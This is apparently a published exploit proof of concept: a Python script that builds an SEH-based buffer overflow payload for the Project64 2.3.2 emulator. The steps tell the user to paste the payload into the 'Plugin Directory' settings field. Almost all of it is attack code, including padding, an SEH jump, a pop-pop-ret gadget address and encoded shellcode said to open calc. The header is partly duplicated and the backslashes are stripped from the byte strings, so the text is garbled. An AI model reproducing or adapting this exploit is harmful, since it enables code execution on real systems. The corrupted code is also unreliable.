Project64 2.3.2 Buffer Overflow

# Exploit Title: Project64 2.3.2 - Local BufferOverflow (SEH)
# Date: 2018-08-21
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Software Li # Exploit Title: Project64 2.3.2 - Local BufferOverflow (SEH)
# Date: 2018-08-21
# Author: Shubham Singh
# Known As: Spirited Wolf [Twitter: @Pwsecspirit]
# Software Link:https://www.pj64-emu.com/download/project64-latest
# Tested Version: 2.3.2
# Tested on OS: Windows XP Service Pack 3 x86 , Windows 7 ultimate x86

# Steps to Reproduce:
# 1. Run the python exploit script, it will create a new file with the name "exploit.txt".
# 2. Just copy the text inside "exploit.txt".
# 3. Start the program. In the new window click "Options" > "Settings" > "Directories".
# 4. Now paste the content of "exploit.txt" into the field:"Plugin Directory" and make sure it is selected. Click "Apply" > "Ok"
# You will see a sweet calculator poped up.
# Greetz: @hexachordanu @FuzzySec @LiveOverflow

junk = "A" * 380
nseh = "xEBx06x90x90"
#0x10096609 : pop ebx # pop eax # ret | ascii {PAGE_EXECUTE_READWRITE} [Jabo_Direct3D8.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.7.0.57-ver5 (C:Program FilesProject64 2.3PluginGFXJabo_Direct3D8.dll)
seh = "x09x66x09x10"
nops = "x90" * 18
#badchar x00x0ax0dx2f
buf = ""
buf += "xbax9ax98xafx7exddxc2xd9x74x24xf4x5fx29"
buf += "xc9xb1x31x83xc7x04x31x57x0fx03x57x95x7a"
buf += "x5ax82x41xf8xa5x7bx91x9dx2cx9exa0x9dx4b"
buf += "xeax92x2dx1fxbex1exc5x4dx2bx95xabx59x5c"
buf += "x1ex01xbcx53x9fx3axfcxf2x23x41xd1xd4x1a"
buf += "x8ax24x14x5bxf7xc5x44x34x73x7bx79x31xc9"
buf += "x40xf2x09xdfxc0xe7xd9xdexe1xb9x52xb9x21"
buf += "x3bxb7xb1x6bx23xd4xfcx22xd8x2ex8axb4x08"
buf += "x7fx73x1ax75xb0x86x62xb1x76x79x11xcbx85"
buf += "x04x22x08xf4xd2xa7x8bx5ex90x10x70x5fx75"
buf += "xc6xf3x53x32x8cx5cx77xc5x41xd7x83x4ex64"
buf += "x38x02x14x43x9cx4fxcexeax85x35xa1x13xd5"
buf += "x96x1exb6x9dx3ax4axcbxffx50x8dx59x7ax16"
buf += "x8dx61x85x06xe6x50x0exc9x71x6dxc5xaex8e"
buf += "x27x44x86x06xeex1cx9bx4ax11xcbxdfx72x92"
buf += "xfex9fx80x8ax8ax9axcdx0cx66xd6x5exf9x88"
buf += "x45x5ex28xebx08xccxb0xc2xafx74x52x1b"
pad = "B" * (700 - len(nseh) -len(seh) - len(junk) -len(nops) - len(buf))

payload = junk + nseh +seh + nops + buf + pad

exploit = payload
try:
f=open("exploit.txt","w")
print "[+] Creating %s bytes evil payload.." %len(exploit)
f.write(exploit)
f.close()
print "[+] File created!"
except:
print "File cannot be created"